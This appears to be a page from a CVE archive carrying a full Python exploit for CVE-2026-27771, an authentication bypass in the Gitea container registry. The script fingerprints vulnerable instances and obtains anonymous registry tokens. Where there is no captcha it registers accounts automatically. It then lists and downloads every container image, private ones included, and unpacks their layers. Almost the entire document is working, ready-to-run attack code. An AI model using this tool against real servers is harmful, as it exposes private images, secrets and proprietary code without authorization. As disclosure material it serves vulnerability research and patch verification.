5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-27771-exploit.py PY
#!/usr/bin/env python3
"""
CVE-2026-27771 Gitea Container Registry Auth Bypass - Exploit PoC

Gitea < 1.26.2 ghost-user container pull exploit.
The ReqContainerAccess middleware only checks RequireSignInViewStrict.
It does NOT check package owner visibility. Ghost users (UserID:-1)
can pull ALL container packages without authentication.

Usage:
  # Scan mode (discovery only)
  python3 CVE-2026-27771-exploit.py scan https://gitea.example.com

  # Scan with existing token
  python3 CVE-2026-27771-exploit.py scan https://gitea.example.com --token <jwt>

  # Pull mode (enumerate repos, tags, manifests and layers)
  python3 CVE-2026-27771-exploit.py pull https://gitea.example.com

  # Pull with existing token
  python3 CVE-2026-27771-exploit.py pull https://gitea.example.com --token <jwt>

  # Pull a specific repo
  python3 CVE-2026-27771-exploit.py pull https://gitea.example.com --repo owner/image

  # Dry-run: show what would be pulled without downloading layers
  python3 CVE-2026-27771-exploit.py pull https://gitea.example.com --dry-run

  # Register a new account (if no captcha)
  python3 CVE-2026-27771-exploit.py register https://gitea.example.com --username user --password pass --email user@example.com

References:
    https://noscope.com/blog/gitea-instances-exposing-private-container
    https://blog.gitea.com/release-of-1.26.2/
"""

import base64
import io
import json
import os
import re
import sys
import tarfile
import urllib.request
import urllib.error
import ssl
import http.cookiejar
import urllib.parse


# ---- helpers ----

# TLS context passed to every urlopen() call in this file. Hostname checking
# and certificate verification are both switched off, so server certificates
# are accepted without validation.
ssl_ctx = ssl.create_default_context()
ssl_ctx.check_hostname = False
ssl_ctx.verify_mode = ssl.CERT_NONE

# Accept header value sent with manifest requests: Docker v2 manifest and
# manifest list, plus OCI image manifest and image index.
OCI_MANIFEST_ACCEPT = (
    "application/vnd.docker.distribution.manifest.v2+json,"
    "application/vnd.docker.distribution.manifest.list.v2+json,"
    "application/vnd.oci.image.manifest.v1+json,"
    "application/vnd.oci.image.index.v1+json"
)


# Module-wide cookie jar shared by fetch_auth(), post_form() and cmd_register().
cj = http.cookiejar.CookieJar()


def fetch(url, headers=None):
    """Request *url* without cookies and return ``(status, headers, body)``.

    Args:
        url: Absolute URL to request.
        headers: Optional dict of request headers.

    Returns:
        A 3-tuple ``(status, headers, body)``. HTTP error responses are
        returned the same way as successful ones, with the status taken from
        the error. Any other failure (connection, TLS, timeout, ...) yields
        ``(0, {}, <error text as bytes>)``.
    """
    req = urllib.request.Request(url, headers=headers or {})
    try:
        # The context manager closes the connection once the body is read.
        with urllib.request.urlopen(req, timeout=20, context=ssl_ctx) as resp:
            return resp.status, resp.headers, resp.read()
    except urllib.error.HTTPError as e:
        # An HTTPError wraps an open response; read it, then release it.
        try:
            return e.code, e.headers, e.read()
        finally:
            e.close()
    except Exception as e:
        return 0, {}, str(e).encode()


def fetch_auth(url, headers=None):
    """Request *url* using the shared cookie jar; return ``(status, headers, body)``.

    Cookies held in the module-level jar ``cj`` are attached to the request,
    and cookies set by the response (including HTTP error responses) are
    stored back into it.

    Args:
        url: Absolute URL to request.
        headers: Optional dict of request headers.

    Returns:
        A 3-tuple ``(status, headers, body)``. HTTP error responses are
        returned like successful ones. Any other failure yields
        ``(0, {}, <error text as bytes>)``.
    """
    req = urllib.request.Request(url, headers=headers or {})
    cj.add_cookie_header(req)
    try:
        # The context manager closes the connection once the body is read.
        with urllib.request.urlopen(req, timeout=20, context=ssl_ctx) as resp:
            cj.extract_cookies(resp, req)
            return resp.status, resp.headers, resp.read()
    except urllib.error.HTTPError as e:
        # An HTTPError wraps an open response; use it, then release it.
        try:
            cj.extract_cookies(e, req)
            return e.code, e.headers, e.read()
        finally:
            e.close()
    except Exception as e:
        return 0, {}, str(e).encode()


def post_form(url, data, headers=None):
    """POST *data* as a URL-encoded form using the shared cookie jar.

    Args:
        url: Absolute URL to post to.
        data: Mapping (or sequence of pairs) of form fields; it is encoded
            with ``urllib.parse.urlencode``.
        headers: Optional extra request headers; they override the default
            ``Content-Type`` when they contain that key.

    Returns:
        A 3-tuple ``(status, headers, body)``. HTTP error responses are
        returned like successful ones. Any other failure yields
        ``(0, {}, <error text as bytes>)``.
    """
    body = urllib.parse.urlencode(data).encode()
    hdrs = {"Content-Type": "application/x-www-form-urlencoded"}
    if headers:
        hdrs.update(headers)
    req = urllib.request.Request(url, data=body, headers=hdrs)
    cj.add_cookie_header(req)
    try:
        # The context manager closes the connection once the body is read.
        with urllib.request.urlopen(req, timeout=20, context=ssl_ctx) as resp:
            cj.extract_cookies(resp, req)
            return resp.status, resp.headers, resp.read()
    except urllib.error.HTTPError as e:
        # An HTTPError wraps an open response; use it, then release it.
        try:
            cj.extract_cookies(e, req)
            return e.code, e.headers, e.read()
        finally:
            e.close()
    except Exception as e:
        return 0, {}, str(e).encode()


def decode_jwt_payload(token):
    """Decode the payload segment of a JWT into a dict, without verification.

    The signature is not checked; this is only used to display claims.

    Args:
        token: A dot-separated JWT string (``header.payload.signature``).

    Returns:
        The decoded claims as a dict. An empty dict is returned when *token*
        is not a string, has no payload segment, is not valid base64url/JSON,
        or when the payload decodes to something other than a JSON object,
        so callers can always use ``.get()`` on the result.
    """
    try:
        segment = token.split(".")[1]
        # base64url in JWTs is unpadded; restore exactly the missing "=".
        segment += "=" * (-len(segment) % 4)
        claims = json.loads(base64.urlsafe_b64decode(segment))
    except (AttributeError, IndexError, TypeError, ValueError):
        # binascii.Error, JSONDecodeError and UnicodeDecodeError are all
        # ValueError subclasses.
        return {}
    return claims if isinstance(claims, dict) else {}


def is_pat(token):
    """Return True when *token* looks like a personal access token.

    The test is purely on shape: exactly 40 hexadecimal characters, in either
    letter case (a SHA1-style string).
    """
    pat_shape = re.compile(r'[0-9a-f]{40}', re.IGNORECASE)
    return pat_shape.fullmatch(token) is not None


def exchange_pat(base, username, pat):
    """Trade a personal access token for a registry JWT via HTTP Basic auth.

    Args:
        base: Instance base URL; a trailing slash is stripped.
        username: Account name used as the Basic-auth user.
        pat: Personal access token used as the Basic-auth password.

    Returns:
        The ``token`` field of the JSON response, or ``None`` when the
        endpoint does not answer 200 or the body cannot be interpreted.
    """
    token_url = base.rstrip("/") + "/v2/token?service=container_registry&scope=*"
    basic = base64.b64encode(f"{username}:{pat}".encode()).decode()
    status, _, raw = fetch(token_url, {"Authorization": f"Basic {basic}"})
    if status != 200:
        return None
    try:
        return json.loads(raw).get("token")
    except Exception:
        return None


def parse_version(v):
    """Parse a version string into a ``[major, minor, patch]`` list of ints.

    Leading ``v`` characters are ignored and only the leading dotted numeric
    prefix is read, so pre-release or build suffixes (``-rc1``,
    ``+dev-12-gabc``) do not prevent parsing. Missing minor or patch
    components default to 0, so the result always has exactly three elements
    and can be indexed or compared safely.

    Args:
        v: Version string such as ``"1.26.2"`` or ``"v1.25.0-rc1"``.

    Returns:
        A three-element list of ints, or ``None`` when *v* is not a string or
        does not start with a number.
    """
    if not isinstance(v, str):
        return None
    m = re.match(r"v*(\d+)(?:\.(\d+))?(?:\.(\d+))?", v.strip())
    if m is None:
        return None
    return [int(part) if part is not None else 0 for part in m.groups()]


# ---- registration ----

def cmd_register(base, username, password, email):
    """Run the 'register' command: sign up, log in, then print a token.

    Steps, in order:
      1. Fetch /user/sign_up and stop if the page is unreachable, says
         registration is disabled, lacks the expected field names, or
         mentions a captcha.
      2. POST the sign-up form with the CSRF value scraped from the page.
      3. Fetch /user/login, scrape its CSRF value and POST the credentials.
      4. Try to create an API token named "cve-poc" through the REST API.
      5. Only if that request raises an HTTP error, ask /v2/token for a
         container-registry token using the session cookies instead.

    Args:
        base: Instance URL; "https://" is prepended when it does not start
            with "http".
        username: Account name to register and log in with.
        password: Password submitted for both "password" and "retype".
        email: E-mail address submitted with the sign-up form.

    Returns:
        None. Results are printed. Failures in steps 1-3 terminate the
        process with sys.exit(1).
    """
    b = base.rstrip("/")
    if not b.startswith("http"):
        b = f"https://{b}"

    print(f"[*] Checking registration at {b}")

    st, _, body = fetch(b + "/user/sign_up")
    if st != 200:
        print(f"[-] Cannot access registration page (HTTP {st})")
        sys.exit(1)

    page = body.decode("utf-8", errors="replace")
    if "Registration is disabled" in page:
        print("[-] Registration is disabled on this instance")
        sys.exit(1)

    # Plain substring checks on the HTML, not a real form parse.
    has_fields = all(x in page for x in ["user_name", "email", "password"])
    if not has_fields:
        print("[-] Registration form has no input fields (likely JS-rendered or disabled)")
        sys.exit(1)

    # "captcha_id" contains "captcha", so the second test alone decides.
    has_captcha = "captcha_id" in page or "captcha" in page
    if has_captcha:
        print("[-] Captcha present — cannot auto-register")
        print("    Register manually, then get a token from Settings > Applications > Generate Token")
        print("    Pass it with: --token <sha1_token>\n")
        sys.exit(1)

    # Scrape the hidden CSRF form field from the sign-up page.
    m = re.search(r'name="_csrf" value="([^"]+)"', page)
    if not m:
        print("[-] Could not find CSRF token")
        sys.exit(1)
    csrf = m.group(1)

    data = {
        "_csrf": csrf,
        "user_name": username,
        "email": email,
        "password": password,
        "retype": password,
    }

    print(f"[*] Registering user '{username}'...")
    st, hd, body = post_form(b + "/user/sign_up", data)

    # hd is a plain empty dict when post_form() hit a transport error.
    loc = hd.get("Location", "")
    if st == 302 and "/user/login" in loc:
        print("[+] Registration successful!")
    elif b"/user/sign_up" in body:
        # The sign-up page being served again is treated as a failure.
        print("[-] Registration failed (page returned)")
        sys.exit(1)
    else:
        print(f"[+] Registration appears successful (HTTP {st})")

    print("[*] Logging in...")
    st, _, body = fetch(b + "/user/login")
    page = body.decode("utf-8", errors="replace") if st == 200 else ""
    m = re.search(r'name="_csrf" value="([^"]+)"', page)
    if not m:
        print("[-] Could not get login CSRF")
        sys.exit(1)
    csrf = m.group(1)

    data = {"_csrf": csrf, "user_name": username, "password": password}
    st, hd, body = post_form(b + "/user/login", data)
    # Only the status code is checked; the response body is not inspected.
    if st not in (200, 302):
        print(f"[-] Login failed (HTTP {st})")
        sys.exit(1)

    print("[+] Logged in!")

    print("[*] Getting API token...")
    st, _, body = fetch_auth(b + f"/api/v1/users/{username}/tokens")
    existing_tokens = []
    if st == 200:
        existing_tokens = json.loads(body)
        for t in existing_tokens:
            if t.get("name") == "cve-poc":
                # NOTE(review): the tuple bound to token_val here is never read.
                token_val = fetch_auth(b + f"/api/v1/users/{username}/tokens/{t['id']}")
                print(f"[!] Token 'cve-poc' already exists")
                # The value of an existing token cannot be read back, so a new
                # one is created below. Deleting the old token first was
                # planned but is not implemented.
                # ...

    # Get CSRF for token creation
    st, _, body = fetch_auth(b + f"/api/v1/users/{username}/tokens")
    # NOTE(review): page is assigned here but not used afterwards.
    page = body.decode("utf-8", errors="replace") if st != 200 else "{}"
    csrf_token = None
    # Reuse the "_csrf" cookie from the shared jar, if one was stored.
    for h in cj:
        if h.name == "_csrf":
            csrf_token = h.value
            break
    if not csrf_token:
        csrf_token = ""
        # NOTE(review): this rebinding of data is not read afterwards.
        try:
            data = json.loads(body) if isinstance(body, bytes) and st == 200 else {}
        except:
            pass

    # Try creating token via API
    # Local re-import; the module already imports urllib.request at the top.
    import urllib.request
    token_data = json.dumps({"name": "cve-poc", "scopes": ["all"]}).encode()
    req = urllib.request.Request(
        b + f"/api/v1/users/{username}/tokens",
        data=token_data,
        headers={
            "Content-Type": "application/json",
            "X-Csrf-Token": csrf_token or "",
        }
    )
    cj.add_cookie_header(req)
    try:
        resp = urllib.request.urlopen(req, timeout=20, context=ssl_ctx)
        token_json = json.loads(resp.read())
        # The token value is read from the "sha1" field of the response.
        token_val = token_json.get("sha1", "")
        print(f"[+] Token created: {token_val[:20]}...")
        print(f"\n    Use with: --token {token_val}")
    except urllib.error.HTTPError as e:
        body = e.read()
        try:
            err = json.loads(body)
            print(f"[-] Token creation failed: {err.get('message', body.decode())}")
        except:
            print(f"[-] Token creation failed (HTTP {e.code}): {body.decode()[:200]}")

        # Fallback: extract session and use it directly in the OCI flow
        # This runs only inside the HTTPError handler; other exceptions from
        # the token request propagate to the caller.
        print("[*] Falling back: getting container token via session...")
        st, _, body = fetch_auth(b + "/v2/token?service=container_registry&scope=*")
        if st == 200:
            j = json.loads(body)
            t = j.get("token", "")
            payload = decode_jwt_payload(t)
            print(f"[+] Container token (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')")
            print(f"\n    Use with: --token {t}")


# ---- registration check (for scan output) ----

def check_registration(base):
    """Print a one-line note when the sign-up page looks open.

    Nothing is printed when the page is unreachable, says registration is
    disabled, or lacks any of the expected form field names. Otherwise the
    message states whether the page mentions a captcha.

    Args:
        base: Instance base URL; a trailing slash is stripped.
    """
    status, _, raw = fetch(base.rstrip("/") + "/user/sign_up")
    if status != 200:
        return

    html = raw.decode("utf-8", errors="replace")
    if "Registration is disabled" in html:
        return

    for field in ("user_name", "email", "password"):
        if field not in html:
            return

    # "captcha_id" contains "captcha", so a single substring test covers both.
    if "captcha" in html:
        print("[+] Registration: OPEN (captcha present — register manually)")
    else:
        print("[+] Registration: OPEN (no captcha — use 'register' command)")


# ---- pre-flight check ----

def preflight(base, provided_token=None):
    """Check version, registry presence, REQUIRE_SIGNIN_VIEW status.

    Probes the instance in this order: front page, /api/v1/version, /v2/,
    the sign-up page (via check_registration), the token endpoint (or the
    supplied token), and finally /v2/_catalog. Progress is printed as it goes.

    Args:
        base: Instance base URL; a trailing slash is stripped.
        provided_token: Optional token. A 40-hex-character value is treated
            as a personal access token and exchanged for a registry JWT;
            anything else is used as-is as the bearer token.

    Returns:
        A dict with the keys "base", "version", "token", "repos",
        "require_signin" and "vuln".

    Exits the process with status 1 when the front page is unreachable or
    does not mention "gitea", when the parsed version is at or above 1.26.2,
    when /v2/ answers neither 200 nor 401, or when the token exchange fails.
    """
    print(f"[*] Pre-flight: {base}")
    b = base.rstrip("/")

    st, _, body = fetch(b + "/")
    if st != 200:
        print(f"[-] Not reachable (HTTP {st})")
        sys.exit(1)

    # Fingerprint by a case-insensitive substring search of the front page.
    page = body.decode("utf-8", errors="replace")
    if "gitea" not in page.lower():
        print("[-] Not a Gitea instance")
        sys.exit(1)

    version = None
    st, _, body = fetch(b + "/api/v1/version")
    if st == 200:
        try:
            version = json.loads(body).get("version", "unknown")
            print(f"[+] Version (API): {version}")
        except Exception:
            pass
    elif st == 403:
        # Only on 403 is the front-page HTML searched for a version string.
        print("[*] API requires sign-in (HTTP 403)")
        m = re.search(r'(?:Gitea|gitea)[^v]*v?(\d+\.\d+\.\d+)', page)
        if m:
            version = m.group(1)
            print(f"[+] Version (page): {version}")

    # Exit when the parsed version is >= the cutoff (component-wise compare).
    # NOTE(review): ver[2] is indexed, but parse_version() can return fewer
    # than three components (e.g. for "1.26"), which raises IndexError when
    # major and minor both equal the cutoff's.
    ver = parse_version(version)
    cutoff = parse_version("1.26.2")
    if ver and not (ver[0] < cutoff[0] or (ver[0] == cutoff[0] and ver[1] < cutoff[1]) or
                    (ver[0] == cutoff[0] and ver[1] == cutoff[1] and ver[2] < cutoff[2])):
        print("[-] Version >= 1.26.2 (patched) — not vulnerable to CVE-2026-27771")
        sys.exit(1)

    # Both 200 and 401 are taken as evidence that a registry endpoint exists.
    st, hd, _ = fetch(b + "/v2/")
    if st not in (200, 401):
        print(f"[-] /v2/ -> {st} (no container registry)")
        sys.exit(1)

    www = hd.get("WWW-Authenticate", "")
    print(f"[+] /v2/ -> {st} (WWW-Authenticate: {www[:90]})")

    check_registration(b)

    token = provided_token
    require_signin = False

    if token:
        if is_pat(token):
            print("[+] Provided token is a personal access token (SHA1)")
            print("[*] Exchanging PAT for OCI registry JWT...")
            # The username is read straight from the command line here.
            # NOTE(review): sys.argv[i+1] raises IndexError when --username is
            # the last argument.
            username = None
            if "--username" in sys.argv:
                i = sys.argv.index("--username")
                username = sys.argv[i+1]
            # Prompt interactively until a non-empty name is entered.
            while not username:
                username = input("    Enter your Gitea username: ").strip()
            jwt = exchange_pat(b, username, token)
            if jwt:
                token = jwt
                payload = decode_jwt_payload(token)
                print(f"[+] JWT obtained (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')")
            else:
                print("[-] PAT exchange failed — check username/token")
                sys.exit(1)
        else:
            payload = decode_jwt_payload(token)
            print(f"[+] Using provided token (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')")
    else:
        # No token supplied: request one without credentials.
        st, _, body = fetch(b + "/v2/token?service=container_registry&scope=*")
        if st == 200:
            try:
                j = json.loads(body)
                token = j.get("token")
                payload = decode_jwt_payload(token)
                print(f"[+] Anonymous token granted (UserID: {payload.get('UserID')}, Scope: '{payload.get('Scope')}')")
            except Exception:
                print("[-] Token response not parseable")
        else:
            # Any non-200 answer is interpreted as sign-in being required.
            print(f"[*] Token endpoint -> {st} (REQUIRE_SIGNIN_VIEW likely true)")
            require_signin = True

    if token:
        st, _, body = fetch(b + "/v2/_catalog", {"Authorization": f"Bearer {token}"})
        # NOTE(review): json.loads is unguarded here; a 200 response with a
        # non-JSON body raises.
        repos = json.loads(body).get("repositories", []) if st == 200 else []
        print(f"[+] /v2/_catalog -> {st} ({len(repos)} repos)")
    else:
        repos = []

    # The verdict is a substring test on the raw version string, not a
    # comparison of the parsed version; an unknown version (None) yields False.
    vuln = version is not None and "1.26.2" not in version and not require_signin
    print(f"[+] Vulnerable: {vuln} (require_signin={require_signin})")
    print()
    return {"base": b, "version": version, "token": token, "repos": repos,
            "require_signin": require_signin, "vuln": vuln}


# ---- OCI operations ----

def get_catalog(base, token):
    """Return the repository names listed by ``/v2/_catalog``.

    Args:
        base: Instance base URL without a trailing slash.
        token: Bearer token sent in the Authorization header.

    Returns:
        The ``repositories`` list from the JSON response, or an empty list
        when the endpoint does not answer 200 or the key is absent.
    """
    auth = {"Authorization": f"Bearer {token}"}
    status, _, raw = fetch(base + "/v2/_catalog", auth)
    return json.loads(raw).get("repositories", []) if status == 200 else []


def get_tags(base, token, repo):
    """Return the tags listed for *repo* by ``/v2/<repo>/tags/list``.

    Args:
        base: Instance base URL without a trailing slash.
        token: Bearer token sent in the Authorization header.
        repo: Repository name as it appears in the catalog.

    Returns:
        The value of ``tags`` in the JSON response (an empty list when the
        key is absent), or an empty list when the endpoint does not answer
        200.
    """
    tags_url = base + f"/v2/{repo}/tags/list"
    status, _, raw = fetch(tags_url, {"Authorization": f"Bearer {token}"})
    if status != 200:
        return []
    listing = json.loads(raw)
    return listing.get("tags", [])


def get_manifest(base, token, repo, ref):
    """Fetch and parse the manifest of *repo* at *ref* (a tag or a digest).

    The request advertises the media types in ``OCI_MANIFEST_ACCEPT``.

    Args:
        base: Instance base URL without a trailing slash.
        token: Bearer token sent in the Authorization header.
        repo: Repository name.
        ref: Tag name or digest identifying the manifest.

    Returns:
        The parsed JSON document, or ``None`` when the endpoint does not
        answer 200 or the body is not valid JSON.
    """
    manifest_url = base + f"/v2/{repo}/manifests/{ref}"
    request_headers = {
        "Authorization": f"Bearer {token}",
        "Accept": OCI_MANIFEST_ACCEPT,
    }
    status, _, raw = fetch(manifest_url, request_headers)
    if status != 200:
        return None
    try:
        return json.loads(raw)
    except Exception:
        return None


def download_blob(base, token, repo, digest, outdir):
    """Download one blob and store it as ``<outdir>/<algo>_<hex>.blob``.

    The digest comes from a server-supplied manifest and ends up in a local
    file name, so it is validated against the ``algorithm:encoded`` digest
    grammar first. This keeps a hostile server from steering the write
    outside *outdir* with values such as ``../../x``.

    Args:
        base: Instance base URL without a trailing slash.
        token: Bearer token sent in the Authorization header.
        repo: Repository name.
        digest: Blob digest, e.g. ``sha256:<hex>``.
        outdir: Existing directory the blob file is written into.

    Returns:
        ``(size, path, data)`` on success, or ``(0, None, None)`` when the
        digest is malformed or the server does not answer 200.
    """
    digest_shape = r"[a-z0-9]+(?:[+._-][a-z0-9]+)*:[A-Za-z0-9=_-]+"
    if not isinstance(digest, str) or re.fullmatch(digest_shape, digest) is None:
        return 0, None, None

    st, _, body = fetch(base + f"/v2/{repo}/blobs/{digest}", {
        "Authorization": f"Bearer {token}",
    })
    if st != 200:
        return 0, None, None

    safe = digest.replace(":", "_")
    path = os.path.join(outdir, f"{safe}.blob")
    with open(path, "wb") as f:
        f.write(body)
    return len(body), path, body


def _safe_tar_members(tf, dest):
    """Return the members of *tf* that can be extracted without leaving *dest*."""
    root = os.path.realpath(dest)

    def inside(path):
        resolved = os.path.realpath(path)
        return resolved == root or resolved.startswith(root + os.sep)

    safe = []
    for member in tf.getmembers():
        # Whiteout markers (".wh.<name>") can sit in any directory, so test
        # the base name rather than the start of the full path.
        if os.path.basename(member.name).startswith(".wh."):
            continue
        # Skip device nodes, FIFOs and other special entries.
        if not (member.isfile() or member.isdir() or member.issym() or member.islnk()):
            continue
        target = os.path.join(root, member.name)
        if not inside(target):
            continue
        # Links must also point inside the extraction root.
        if member.issym():
            if not inside(os.path.join(os.path.dirname(target), member.linkname)):
                continue
        elif member.islnk():
            if not inside(os.path.join(root, member.linkname)):
                continue
        safe.append(member)
    return safe


def pull_image(base, token, repo, tag, outdir, dry_run):
    """Fetch the manifest for *repo*:*tag*, download its blobs and unpack them.

    For a manifest list / image index, the linux/amd64 entries are resolved
    to their platform manifests. Layer and config blobs are written to
    ``<outdir>/blobs``, the manifest JSON to *outdir*, and gzip-compressed
    layers are unpacked into ``<outdir>/extracted``.

    Archive contents, digests and tag names come from the remote server and
    are treated as untrusted: archive members that would land outside the
    extraction directory (absolute paths, ``..`` components, links pointing
    outside) and special files are skipped, and the tag is sanitised before
    it is used in a file name.

    Args:
        base: Instance base URL without a trailing slash.
        token: Bearer token for the registry API.
        repo: Repository name.
        tag: Tag to pull.
        outdir: Directory that receives blobs, manifests and extracted files.
        dry_run: When true, only the blob count is reported; nothing is
            downloaded or written.

    Returns:
        None. Progress is printed.
    """
    print(f"    └─ manifest {tag}: ", end="", flush=True)
    manifest = get_manifest(base, token, repo, tag)
    if not manifest:
        print("FAIL (no manifest)")
        return

    layers = []
    plat_manifest = None
    # Tolerate an explicit null mediaType.
    media_type = manifest.get("mediaType") or ""
    is_index = "manifest.list" in media_type or "index" in media_type
    if is_index:
        for m in manifest.get("manifests", []):
            platform = m.get("platform", {})
            if platform.get("architecture") == "amd64" and platform.get("os") == "linux":
                print(f"multi-arch, digest={m['digest'][:20]}...", end="")
                plat_manifest = get_manifest(base, token, repo, m["digest"])
                if plat_manifest:
                    layers.extend(l["digest"] for l in plat_manifest.get("layers", []))
                    cd = plat_manifest.get("config", {}).get("digest")
                    if cd:
                        layers.append(cd)
    else:
        layers.extend(l["digest"] for l in manifest.get("layers", []))
        config_digest = manifest.get("config", {}).get("digest")
        if config_digest:
            layers.append(config_digest)

    print(f", {len(layers)} blobs", end="")
    if dry_run:
        print(" (dry-run, skipped)")
        return
    print()

    blob_dir = os.path.join(outdir, "blobs")
    extract_dir = os.path.join(outdir, "extracted")
    os.makedirs(blob_dir, exist_ok=True)
    os.makedirs(extract_dir, exist_ok=True)
    downloaded = []
    for i, d in enumerate(layers):
        sz, path, data = download_blob(base, token, repo, d, blob_dir)
        if sz:
            safe_name = d.replace(":", "_")[:50]
            size_str = f"{sz} bytes"
            if sz > 1024 * 1024:
                size_str = f"{sz / 1024 / 1024:.1f} MB"
            elif sz > 1024:
                size_str = f"{sz / 1024:.1f} KB"
            print(f"      [{i+1}/{len(layers)}] {safe_name}... ({size_str})")
            downloaded.append((path, data))
        else:
            print(f"      [{i+1}/{len(layers)}] {d[:30]}... FAILED")

    # The tag is server-supplied; keep only characters that are safe in a
    # file name so it cannot introduce path separators.
    safe_tag = re.sub(r"[^A-Za-z0-9_.-]", "_", str(tag))
    man_path = os.path.join(outdir, f"manifest_{safe_tag}.json")
    with open(man_path, "w", encoding="utf-8") as f:
        json.dump(manifest, f, indent=2)
    if is_index:
        man2_path = os.path.join(outdir, f"plat_manifest_{safe_tag}.json")
        with open(man2_path, "w", encoding="utf-8") as f:
            json.dump(plat_manifest if plat_manifest else {}, f, indent=2)
    print("      manifests saved")

    total_extracted = 0
    for blob_path, blob_data in downloaded:
        # Only blobs starting with a gzip or compress magic number are tried.
        if not blob_data or blob_data[:2] not in (b"\x1f\x8b", b"\x1f\x9d"):
            continue
        try:
            with tarfile.open(fileobj=io.BytesIO(blob_data), mode="r:*") as tf:
                members = _safe_tar_members(tf, extract_dir)
                tf.extractall(path=extract_dir, members=members)
                total_extracted += len(members)
        except Exception as exc:
            # Best effort: report the layer that failed and carry on.
            print(f"      [!] could not extract {os.path.basename(blob_path)}: {exc}")
    if total_extracted:
        print(f"      extracted {total_extracted} files to {extract_dir}")


# ---- commands ----

def cmd_scan(cfg):
    """Run the 'scan' command: list each catalog repository with its tags.

    Args:
        cfg: Dict produced by ``preflight``; only the ``"base"`` and
            ``"token"`` keys are read.

    Returns:
        None. When no token is available a hint is printed and no requests
        are made.
    """
    base = cfg["base"]
    token = cfg["token"]

    if not token:
        print("[!] No token available — scan limited")
        print("    Get a token: Settings > Applications > Generate Token")
        print("    Pass it with: --token <sha1_token>\n")
        return

    repos = get_catalog(base, token)
    print(f"[*] Container repositories: {len(repos)}")
    for repo in repos:
        tags = get_tags(base, token, repo)
        print(f"    {repo}: tags={tags}")
    if not repos:
        print("    (none — no container packages exist)")
    print()


def cmd_pull(cfg, specific_repo=None, dry_run=False):
    """Run the 'pull' command over one repository or the whole catalog.

    Args:
        cfg: Dict produced by ``preflight``; the ``"base"`` and ``"token"``
            keys are read.
        specific_repo: When given, only this repository is processed;
            otherwise every repository in the catalog is.
        dry_run: Passed through to ``pull_image``.

    Returns:
        None. When no token is available a hint is printed and no requests
        are made.
    """
    base, token = cfg["base"], cfg["token"]

    if not token:
        for hint in (
            "[!] Cannot pull — no token available",
            "    Get a token: Settings > Applications > Generate Token",
            "    Pass it with: --token <sha1_token>",
        ):
            print(hint)
        return

    if specific_repo:
        targets = [specific_repo]
    else:
        targets = get_catalog(base, token)
        print(f"[*] Found {len(targets)} repos in catalog")

    # "/" and ":" in repository names become "_" in the directory name.
    to_underscore = str.maketrans("/:", "__")
    for repo in targets:
        print(f"\n  [{repo}]")
        tags = get_tags(base, token, repo)
        print(f"  Tags: {tags}")
        if not tags:
            print("  (no tags)")
            continue

        safe_repo = repo.translate(to_underscore)
        outdir = "/dev/null" if dry_run else f"pulled_{safe_repo}"

        for tag in tags:
            pull_image(base, token, repo, tag, outdir, dry_run)


# ---- main ----

if __name__ == "__main__":
    # Usage: <script> <command> <target> [--token T] [--repo R] [--dry-run]
    #        [--username U --password P --email E]
    if len(sys.argv) < 3:
        print(__doc__)
        sys.exit(1)

    def _option_value(flag):
        """Return the argument following *flag*, or None when it is absent.

        Exits with a message instead of raising IndexError when the flag is
        the last argument on the command line.
        """
        if flag not in sys.argv:
            return None
        idx = sys.argv.index(flag)
        if idx + 1 >= len(sys.argv):
            print(f"Missing value for {flag}")
            sys.exit(1)
        return sys.argv[idx + 1]

    command = sys.argv[1]
    target = sys.argv[2]

    # Reject an unknown command before any request is sent to the target.
    if command not in ("scan", "pull", "register"):
        print(f"Unknown command: {command}")
        sys.exit(1)

    provided_token = _option_value("--token")
    specific_repo = _option_value("--repo")
    dry_run = "--dry-run" in sys.argv

    if command == "register":
        username = _option_value("--username")
        password = _option_value("--password")
        email = _option_value("--email")
        if not all([username, password, email]):
            print("Usage: register https://gitea.example.com --username u --password p --email user@example.com")
            sys.exit(1)
        # cmd_register adds the URL scheme itself when it is missing.
        cmd_register(target, username, password, email)
        sys.exit(0)

    if not target.startswith("http"):
        target = f"https://{target}"

    cfg = preflight(target, provided_token=provided_token)

    if command == "scan":
        cmd_scan(cfg)
    else:
        cmd_pull(cfg, specific_repo, dry_run)